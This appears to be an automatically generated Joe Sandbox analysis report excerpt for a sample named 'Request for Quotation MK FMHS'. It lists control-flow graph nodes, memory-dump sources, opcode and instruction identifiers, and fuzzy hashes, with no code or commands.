                                                                                                                        • Instruction ID: 4c91a55a9870e0faebd02fbfe0f327c286d8900019163331da67a132b074e5bd
                                                                                                                        • Opcode Fuzzy Hash: d4ffe41341f7ec74e98b507b7915c72aeb47beb7fbe881fdbe2c477f88844df3
                                                                                                                        • Instruction Fuzzy Hash: 76123870A01629CFDB15CF69CC84EAEBBB2BF98304F158069E905AB361DB35E941CF50

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 3986 16229ec-16229f6 3988 1622981-162298a 3986->3988 3989 16229f8-1622a01 3986->3989 3991 1622990-1622999 3988->3991 3990 1622a03-1622a3b 3989->3990 3989->3991 3994 1622a5d-1622aac 3990->3994 3995 1622a3d-1622a5c 3990->3995 3996 16229a0-16229c8 3991->3996 4001 1622ac7-1622acf 3994->4001 4002 1622aae-1622ab5 3994->4002 4005 1622ad2-1622ae6 4001->4005 4003 1622ab7-1622abc 4002->4003 4004 1622abe-1622ac5 4002->4004 4003->4005 4004->4005 4008 1622ae8-1622aef 4005->4008 4009 1622afc-1622b04 4005->4009 4010 1622af1-1622af3 4008->4010 4011 1622af5-1622afa 4008->4011 4012 1622b06-1622b0a 4009->4012 4010->4012 4011->4012 4014 1622b6a-1622b6d 4012->4014 4015 1622b0c-1622b21 4012->4015 4016 1622bb5-1622bbb 4014->4016 4017 1622b6f-1622b84 4014->4017 4015->4014 4022 1622b23-1622b26 4015->4022 4019 1622bc1-1622bc3 4016->4019 4020 16236b6 4016->4020 4017->4016 4024 1622b86-1622b8a 4017->4024 4019->4020 4023 1622bc9-1622bce 4019->4023 4027 16236bb-16236f0 4020->4027 4025 1622b45-1622b63 call 16202c8 4022->4025 4026 1622b28-1622b2a 4022->4026 4028 1623664-1623668 4023->4028 4029 1622bd4 4023->4029 4032 1622b92-1622bb0 call 16202c8 4024->4032 4033 1622b8c-1622b90 4024->4033 4025->4014 4026->4025 4034 1622b2c-1622b2f 4026->4034 4045 16236f2-1623700 4027->4045 4046 162371f-1623728 4027->4046 4030 162366a-162366d 4028->4030 4031 162366f-16236b5 4028->4031 4029->4028 4030->4027 4030->4031 4032->4016 4033->4016 4033->4032 4034->4014 4037 1622b31-1622b43 4034->4037 4037->4014 4037->4025 4049 1623702-162371c 4045->4049 4050 162372e-1623874 4045->4050 4046->4050 4049->4046 4051 16238a6-16238a9 4050->4051 4052 1623876-1623878 4050->4052 4055 16238aa-16238bc 4051->4055 4052->4055 4056 162387a-1623881 4052->4056 4058 16238ee-16238f4 4055->4058 4059 16238be-16238d1 4055->4059 4056->4051 4060 16238f6-1623908 4058->4060 4061 1623928-1623930 4058->4061 4059->4058 4062 162393a-162393d 4060->4062 4064 162390a-162390c 4060->4064 4061->4062 4065 162393e-1623941 4062->4065 4064->4065 4066 162390e-1623910 4064->4066 4067 1623942-1623969 4065->4067 4066->4067 4068 1623912-1623919 4066->4068 4068->4061
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0347abd8be8ad5056e42e5f10565d3856b6be65f873d66ef2c7ac4664beb786f
                                                                                                                        • Instruction ID: 66cc32353291a34465060c46800b33ebe8090a94156a125067db9e9547e44fdd
                                                                                                                        • Opcode Fuzzy Hash: 0347abd8be8ad5056e42e5f10565d3856b6be65f873d66ef2c7ac4664beb786f
                                                                                                                        • Instruction Fuzzy Hash: 57D1E3339486958FC721CF78E8E1B59BBB5FB4B304F1845ADC4249B621CB39A841CF61
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e5f84e117b98f081d0db47cb715dc4f85587f8c6a85e561f657c23e3e340088a
                                                                                                                        • Instruction ID: 9c507de470996560e17be108873204756a45d17ce30bc1f9c97d6d59e4377303
                                                                                                                        • Opcode Fuzzy Hash: e5f84e117b98f081d0db47cb715dc4f85587f8c6a85e561f657c23e3e340088a
                                                                                                                        • Instruction Fuzzy Hash: C891D674E00628CFEB18DFAAD844B9DBBF2BF89300F148069E819AB355DB749945CF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 442da85fee9ba6c8a60e89cfbd30813d59692d08d9897c5d89ae590d6f2fd1c6
                                                                                                                        • Instruction ID: 719bd16437cc966029baaf8085689b00b2e2da0bc1ab2584dd078eb3155149cc
                                                                                                                        • Opcode Fuzzy Hash: 442da85fee9ba6c8a60e89cfbd30813d59692d08d9897c5d89ae590d6f2fd1c6
                                                                                                                        • Instruction Fuzzy Hash: F181B274E00618CFEB14DFAAD844A9DBBF2BF89300F14C06AE819AB365DB749945CF51
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6d06810d228f4c41b16c4aaae31171faa5098fdf7ad0313fd57fdede8f421c1a
                                                                                                                        • Instruction ID: 14e943b82a92332586c789e8c22ae5c6e092994d42d3b0978e6c38cfaca9959b
                                                                                                                        • Opcode Fuzzy Hash: 6d06810d228f4c41b16c4aaae31171faa5098fdf7ad0313fd57fdede8f421c1a
                                                                                                                        • Instruction Fuzzy Hash: D991C174E01618CFDB28CFA9D884A9DBBF2BF89311F158069E809BB365DB349945CF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ac52f23a19f8563c347e0d3e53b4d2a14ff7910f26f7971ac2d48f681b5ecc8c
                                                                                                                        • Instruction ID: dfca91cc9115f36ff0544843dab56e144179fe0ad1411865673815a9b63b4014
                                                                                                                        • Opcode Fuzzy Hash: ac52f23a19f8563c347e0d3e53b4d2a14ff7910f26f7971ac2d48f681b5ecc8c
                                                                                                                        • Instruction Fuzzy Hash: F381C274E00618CFEB14DFAAD884A9DBBF2BF88301F148069E819AB365DB349945DF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 82a061692544cd15813ee760f05a3e49f4d438b21dccb81018b29c0aba781d67
                                                                                                                        • Instruction ID: df5c45395600fa35896a8a63a8738f9dbf05a6ef3f9ebca159df1f4bc1ae3f18
                                                                                                                        • Opcode Fuzzy Hash: 82a061692544cd15813ee760f05a3e49f4d438b21dccb81018b29c0aba781d67
                                                                                                                        • Instruction Fuzzy Hash: F581C374E01618CFEB14DFAAD884A9DBBF2BF89300F14C069E819AB365DB349945CF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f8e8e34f385416a18dbd749942e86b00d38beff1c1b06f0a507afbc69a70fe63
                                                                                                                        • Instruction ID: 4fb50c7a689d40b170dd4d88878a4f27cd19c8ab7e0380c132c05aec33c5a127
                                                                                                                        • Opcode Fuzzy Hash: f8e8e34f385416a18dbd749942e86b00d38beff1c1b06f0a507afbc69a70fe63
                                                                                                                        • Instruction Fuzzy Hash: A981B274E00618CFEB14DFAAD884A9DBBF2BF88300F14C069E819AB365DB749945CF51
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d78767f175c4d64b4ff9a90977478b78f60616ef19e6451b60d6fcbb2a8f1a83
                                                                                                                        • Instruction ID: ce2580274c3fd93695564d2bea00525a5a8346ebfaf28bbe3856c8b53844db98
                                                                                                                        • Opcode Fuzzy Hash: d78767f175c4d64b4ff9a90977478b78f60616ef19e6451b60d6fcbb2a8f1a83
                                                                                                                        • Instruction Fuzzy Hash: 1D81B074E00618CFEB14DFAAD984A9DBBF2BF88300F15C069E819AB365DB749945CF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 36f6ad1f045e18b5fe98b9913fe7736028a6953526b578ce8056f7d3fb6ee768
                                                                                                                        • Instruction ID: 6058dfdff6d637f0a8606abbe472c2576f790ec823e8d2e1b9abc42312d704f1
                                                                                                                        • Opcode Fuzzy Hash: 36f6ad1f045e18b5fe98b9913fe7736028a6953526b578ce8056f7d3fb6ee768
                                                                                                                        • Instruction Fuzzy Hash: 9281A674E00618CFDB14DFA9D944A9DBBF2BF88311F24C069D819AB365DB349945CF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3d81646dd6dc8fe4878531dcd4e1d46833a7111e2816f1cef794f79fac53c5a9
                                                                                                                        • Instruction ID: 3320c943eba7287d77efe3350d23e120f10f35dd57e4ffc8d9860622bca9acb9
                                                                                                                        • Opcode Fuzzy Hash: 3d81646dd6dc8fe4878531dcd4e1d46833a7111e2816f1cef794f79fac53c5a9
                                                                                                                        • Instruction Fuzzy Hash: 1651B774E00618DFEB18DFAAD884A9DBBB2FF89300F24C029E815AB365DB315941CF14
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 685d44337db5ee058bbbb1b14fc76ec8e5473f2b9a5eec9f72bd3f2389b6d843
                                                                                                                        • Instruction ID: e60759142d7c16dadf6a04dabbc0752ff4ef3f1908c2c0188e053b4be9908fbf
                                                                                                                        • Opcode Fuzzy Hash: 685d44337db5ee058bbbb1b14fc76ec8e5473f2b9a5eec9f72bd3f2389b6d843
                                                                                                                        • Instruction Fuzzy Hash: AC519674E00618DFEB18DFAAD994A9DBBF2BF89300F24C029E815AB364DB355941CF14
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: df48460e7dac0ef8ec634f34abb3934aee6684f3058428dcd4a9564152e19eb8
                                                                                                                        • Instruction ID: 4216609b1c1cf4eff32fc97717fc092d3160494cd7860807fda1b40e66a7c976
                                                                                                                        • Opcode Fuzzy Hash: df48460e7dac0ef8ec634f34abb3934aee6684f3058428dcd4a9564152e19eb8
                                                                                                                        • Instruction Fuzzy Hash: 2451A474E01218DFDB54DFA9D98499DBBF2FF89300F20816AE819AB364DB31A905CF50

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1051 6de992c 1052 6de99eb-6de99fc 1051->1052 1053 6de99fe 1052->1053 1054 6de9a03-6de9a0c 1052->1054 1053->1054 1056 6de9a12-6de9a25 1054->1056 1057 6de97e3-6de9808 1054->1057 1060 6de9a2c-6de9a47 1056->1060 1061 6de9a27 1056->1061 1058 6de980f-6de9846 1057->1058 1059 6de980a 1057->1059 1070 6de984d-6de987f 1058->1070 1071 6de9848 1058->1071 1059->1058 1062 6de9a4e-6de9a62 1060->1062 1063 6de9a49 1060->1063 1061->1060 1067 6de9a69-6de9a7f LdrInitializeThunk 1062->1067 1068 6de9a64 1062->1068 1063->1062 1069 6de9a81-6de9b7e 1067->1069 1068->1067 1073 6de9b86-6de9b90 1069->1073 1074 6de9b80-6de9b85 1069->1074 1076 6de98e3-6de98f6 1070->1076 1077 6de9881-6de98a6 1070->1077 1071->1070 1074->1073 1081 6de98fd-6de9922 1076->1081 1082 6de98f8 1076->1082 1078 6de98ad-6de98db 1077->1078 1079 6de98a8 1077->1079 1078->1076 1079->1078 1085 6de9924-6de9925 1081->1085 1086 6de9931-6de9969 1081->1086 1082->1081 1085->1056 1087 6de996b 1086->1087 1088 6de9970-6de99d1 call 6de9328 1086->1088 1087->1088 1094 6de99d8-6de99ea 1088->1094 1095 6de99d3 1088->1095 1094->1052 1095->1094
                                                                                                                        APIs
                                                                                                                        • LdrInitializeThunk.NTDLL(00000000), ref: 06DE9A6E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3842296194.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_6de0000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 517863071ab3c08a6dec65c84fe08c13e78a29e0e4c1ca5577fc61e17ae1f5ca
                                                                                                                        • Instruction ID: 515f93f3ec89184b10694e3b3dbbfa48eb95296e6534d4417938b8d3c0e27d40
                                                                                                                        • Opcode Fuzzy Hash: 517863071ab3c08a6dec65c84fe08c13e78a29e0e4c1ca5577fc61e17ae1f5ca
                                                                                                                        • Instruction Fuzzy Hash: C0115974E412099FEB54EBA8E894EADB7F5FF88314F148169E844AB241DB30E941CB64

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 2130 1628490-162897e 2205 1628ed0-1628f05 2130->2205 2206 1628984-1628994 2130->2206 2210 1628f11-1628f2f 2205->2210 2211 1628f07-1628f0c 2205->2211 2206->2205 2207 162899a-16289aa 2206->2207 2207->2205 2209 16289b0-16289c0 2207->2209 2209->2205 2212 16289c6-16289d6 2209->2212 2224 1628f31-1628f3b 2210->2224 2225 1628fa6-1628fb2 2210->2225 2213 1628ff6-1628ffb 2211->2213 2212->2205 2214 16289dc-16289ec 2212->2214 2214->2205 2216 16289f2-1628a02 2214->2216 2216->2205 2217 1628a08-1628a18 2216->2217 2217->2205 2219 1628a1e-1628a2e 2217->2219 2219->2205 2220 1628a34-1628a44 2219->2220 2220->2205 2221 1628a4a-1628a5a 2220->2221 2221->2205 2223 1628a60-1628ecf 2221->2223 2224->2225 2231 1628f3d-1628f49 2224->2231 2229 1628fb4-1628fc0 2225->2229 2230 1628fc9-1628fd5 2225->2230 2229->2230 2238 1628fc2-1628fc7 2229->2238 2240 1628fd7-1628fe3 2230->2240 2241 1628fec-1628fee 2230->2241 2236 1628f4b-1628f56 2231->2236 2237 1628f6e-1628f71 2231->2237 2236->2237 2249 1628f58-1628f62 2236->2249 2242 1628f73-1628f7f 2237->2242 2243 1628f88-1628f94 2237->2243 2238->2213 2240->2241 2251 1628fe5-1628fea 2240->2251 2241->2213 2242->2243 2255 1628f81-1628f86 2242->2255 2247 1628f96-1628f9d 2243->2247 2248 1628ffc-162901e 2243->2248 2247->2248 2252 1628f9f-1628fa4 2247->2252 2256 1629020 2248->2256 2257 162902e 2248->2257 2249->2237 2259 1628f64-1628f69 2249->2259 2251->2213 2252->2213 2255->2213 2256->2257 2260 1629027-162902c 2256->2260 2262 1629030-1629031 2257->2262 2259->2213 2260->2262
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2f36dde6a973cebb665504b43ec9461d6d159a38a6c602123a7cbe5165d1be0a
                                                                                                                        • Instruction ID: 8077c04804a0ab9d07ded93a5afd72f5c9df889c91aa83b3dbb764e7fe50f142
                                                                                                                        • Opcode Fuzzy Hash: 2f36dde6a973cebb665504b43ec9461d6d159a38a6c602123a7cbe5165d1be0a
                                                                                                                        • Instruction Fuzzy Hash: 41521E74A002198FEB15DBA4CC60BAEB7B6FF98300F1080ADD60A6B395CB359E45DF55

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 2321 162e007-162e022 2323 162e024 2321->2323 2324 162e029-162e02a call 162e8e8 2321->2324 2323->2324 2325 162e030-162e099 2324->2325 2341 162e0a0-162e0a7 call 162f71f 2325->2341 2646 162e0a8 call 6de0b30 2341->2646 2647 162e0a8 call 6de0b20 2341->2647 2343 162e0ae 2648 162e0af call 6de178f 2343->2648 2649 162e0af call 6de17a0 2343->2649 2344 162e0b5 2650 162e0b6 call 6de1e80 2344->2650 2651 162e0b6 call 6de1e70 2344->2651 2345 162e0bc-162e0d1 call 6de2968 2349 162e0d8 2345->2349 2350 162e0df 2349->2350 2351 162e0e6-162e0ed 2350->2351 2353 162e0f4-162e0fb 2351->2353 2355 162e102-162e110 2353->2355 2358 162e117-162e11e 2355->2358 2360 162e125 2358->2360 2361 162e12c 2360->2361 2362 162e133 2361->2362 2363 162e13a 2362->2363 2364 162e141 2363->2364 2365 162e148 2364->2365 2366 162e14f-162e156 2365->2366 2368 162e15d-162e164 2366->2368 2370 162e16b 2368->2370 2371 162e172-162e179 2370->2371 2373 162e180 2371->2373 2374 162e187 2373->2374 2375 162e18e 2374->2375 2376 162e195-162e19c 2375->2376 2378 162e1a3-162e1b1 2376->2378 2381 162e1b8 2378->2381 2382 162e1bf-162e1c6 2381->2382 2384 162e1cd-162e1d4 2382->2384 2386 162e1db-162e1e2 2384->2386 2388 162e1e9 2386->2388 2389 162e1f0 2388->2389 2390 162e1f7 2389->2390 2391 162e1fe 2390->2391 2392 162e205 2391->2392 2393 162e20c-162e213 2392->2393 2395 162e21a 2393->2395 2396 162e221-162e22f 2395->2396 2399 162e236-162e23d 2396->2399 2401 162e244 2399->2401 2402 162e24b-162e252 2401->2402 2404 162e259 2402->2404 2405 162e260 2404->2405 2406 162e267-162e275 2405->2406 2409 162e27c-162e283 2406->2409 2411 162e28a 2409->2411 2412 162e291 2411->2412 2413 162e298-162e29f 2412->2413 2415 162e2a6-162e2ad 2413->2415 2417 162e2b4-162e2bb 2415->2417 2419 162e2c2-162e2c9 2417->2419 2421 162e2d0-162e2d7 2419->2421 2423 162e2de-162e2f3 2421->2423 2427 162e2fa-162e301 2423->2427 2429 162e308 2427->2429 2430 162e30f-162e316 2429->2430 2432 162e31d-162e324 2430->2432 2434 162e32b-162e332 2432->2434 2436 162e339 2434->2436 2437 162e340 2436->2437 2438 162e347-162e34e 2437->2438 2440 162e355-162e35c 2438->2440 2442 162e363-162e36a 2440->2442 2444 162e371-162e378 2442->2444 2446 162e37f-162e386 2444->2446 2448 162e38d 2446->2448 2449 162e394 2448->2449 2450 162e39b-162e3a2 2449->2450 2452 162e3a9-162e3b7 2450->2452 2455 162e3be 2452->2455 2456 162e3c5-162e3cc 2455->2456 2458 162e3d3 2456->2458 2459 162e3da 2458->2459 2460 162e3e1 2459->2460 2461 162e3e8-162e3f6 2460->2461 2464 162e3fd-162e412 2461->2464 2468 162e419-162e420 2464->2468 2470 162e427-162e482 2468->2470 2484 162e489 2470->2484 2485 162e490-162e4f9 2484->2485 2501 162e500-162e507 2485->2501 2503 162e50e-162e515 2501->2503 2505 162e51c 2503->2505 2506 162e523-162e538 2505->2506 2510 162e53f 2506->2510 2511 162e546-162e60a 2510->2511 2540 162e611-162e618 2511->2540 2653 162e619 call 6defc5f 2540->2653 2654 162e619 call 6defc68 2540->2654 2542 162e61f 2543 162e626 2542->2543 2544 162e62d-162e63b 2543->2544 2547 162e642 2544->2547 2548 162e649-162e6d5 2547->2548 2569 162e6dc 2548->2569 2570 162e6e3-162e71b 2569->2570 2579 162e722-162e729 2570->2579 2581 162e730-162e73e 2579->2581 2584 162e745 2581->2584 2585 162e74c-162e82c 2584->2585 2618 162e833 2585->2618 2619 162e83a-162e848 2618->2619 2622 162e84f 2619->2622 2623 162e856 2622->2623 2624 162e85d-162e86b 2623->2624 2627 162e872-162e879 2624->2627 2629 162e880-162e8aa 2627->2629 2636 162e8b1-162e8c6 2629->2636 2640 162e8cd 2636->2640 2641 162e8d4 2640->2641 2642 162e8db 2641->2642 2643 162e8e2-162e8e5 2642->2643 2646->2343 2647->2343 2648->2344 2649->2344 2650->2345 2651->2345 2653->2542 2654->2542
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ab65811cb63e336dccdc728e5dbafb19061d4d4172c6dfc7636de2641252fce3
                                                                                                                        • Instruction ID: 240ccc64d60baa5393ed0741424fb6a47d68980ef53f6708318a1150d1ea7597
                                                                                                                        • Opcode Fuzzy Hash: ab65811cb63e336dccdc728e5dbafb19061d4d4172c6dfc7636de2641252fce3
                                                                                                                        • Instruction Fuzzy Hash: 3812AB750217528FEB61AF74EEBC02ABA64FB1F367B04BD81E01BC10499B721664CF61

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 2655 162e018-162e022 2656 162e024 2655->2656 2657 162e029-162e0a7 call 162e8e8 call 162f71f 2655->2657 2656->2657 2984 162e0a8 call 6de0b30 2657->2984 2985 162e0a8 call 6de0b20 2657->2985 2676 162e0ae 2986 162e0af call 6de178f 2676->2986 2987 162e0af call 6de17a0 2676->2987 2677 162e0b5 2977 162e0b6 call 6de1e80 2677->2977 2978 162e0b6 call 6de1e70 2677->2978 2678 162e0bc-162e618 call 6de2968 2980 162e619 call 6defc5f 2678->2980 2981 162e619 call 6defc68 2678->2981 2875 162e61f-162e8db 2976 162e8e2-162e8e5 2875->2976 2977->2678 2978->2678 2980->2875 2981->2875 2984->2676 2985->2676 2986->2677 2987->2677
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: fd91dd3e648a1077a1de069f5a8a6c64c7125cab4cab2641170e20194f2de109
                                                                                                                        • Instruction ID: ba6598814f11868f34b17e4557392358ec33ea9f8f152723e8b6c755ebac9ee8
                                                                                                                        • Opcode Fuzzy Hash: fd91dd3e648a1077a1de069f5a8a6c64c7125cab4cab2641170e20194f2de109
                                                                                                                        • Instruction Fuzzy Hash: C712AA750217128FEB61AF74EEBC12ABA64FB1F367B04BD81E01B814499F721264CF61

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 2988 1620c8f-1620cc0 2990 1620cc2 2988->2990 2991 1620cc7-1620cdd call 1620780 2988->2991 2990->2991 2994 1620ce2 2991->2994 2995 1620cee-162104e call 1620780 * 13 2994->2995 3069 1621056-162107d call 16227f0 2995->3069 3177 1621080 call 1623cc0 3069->3177 3178 1621080 call 1623b95 3069->3178 3072 1621086-162108f 3179 1621092 call 16241a0 3072->3179 3180 1621092 call 1624285 3072->3180 3073 1621098-16210c2 3076 16210cb-16210ce call 1625362 3073->3076 3077 16210d4-16210fe 3076->3077 3080 1621107-162110a call 162c19b 3077->3080 3081 1621110-162113a 3080->3081 3084 1621143 3081->3084 3189 1621146 call 162c19b 3084->3189 3190 1621146 call 162c468 3084->3190 3085 162114c-1621176 3088 162117f-1621182 call 162c738 3085->3088 3089 1621188-16211b2 3088->3089 3092 16211bb-16211be call 162ca08 3089->3092 3093 16211c4-16211f7 3092->3093 3096 1621203-1621209 call 162ccd8 3093->3096 3097 162120f-162124b 3096->3097 3100 1621257-162125d call 162cfac 3097->3100 3101 1621263-162129f 3100->3101 3104 16212ab-16212b1 call 162d278 3101->3104 3105 16212b7-16213d2 3104->3105 3118 16213de-16213f0 call 1625362 3105->3118 3119 16213f6-162145c 3118->3119 3124 1621467-1621473 call 162d548 3119->3124 3125 1621479-1621485 3124->3125 3126 1621490-162149c call 162d548 3125->3126 3127 16214a2-16214ae 3126->3127 3128 16214b9-16214c5 call 162d548 3127->3128 3129 16214cb-16214d7 3128->3129 3130 16214e2-16214ee call 162d548 3129->3130 3131 16214f4-1621500 3130->3131 3132 162150b-1621517 call 162d548 3131->3132 3133 162151d-1621529 3132->3133 3134 1621534-162153a 3133->3134 3175 1621540 call 162d6d4 3134->3175 3176 1621540 call 162d548 3134->3176 3135 1621546-1621552 3136 162155d-1621569 call 162d548 3135->3136 3137 162156f-162158c 3136->3137 3139 1621597-16215a3 call 162d548 3137->3139 3140 16215a9-16215b5 3139->3140 3141 16215c0-16215cc call 162d548 3140->3141 3142 16215d2-16215de 3141->3142 3143 16215e9-16215f5 call 162d548 3142->3143 3144 16215fb-1621607 3143->3144 3145 1621612-162161e call 162d548 3144->3145 3146 1621624-1621630 3145->3146 3147 162163b-1621647 call 162d548 3146->3147 3148 162164d-1621659 3147->3148 3149 1621664-1621670 call 162d548 3148->3149 3150 1621676-1621682 3149->3150 3151 162168d-1621699 call 162d548 3150->3151 3152 162169f-16216ab 3151->3152 3153 16216b6-16216c2 call 162d548 3152->3153 3154 16216c8-16216d4 3153->3154 3155 16216df-16216eb call 162d548 3154->3155 3156 16216f1-16217aa 3155->3156 3175->3135 3176->3135 3177->3072 3178->3072 3179->3073 3180->3073 3189->3085 3190->3085
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
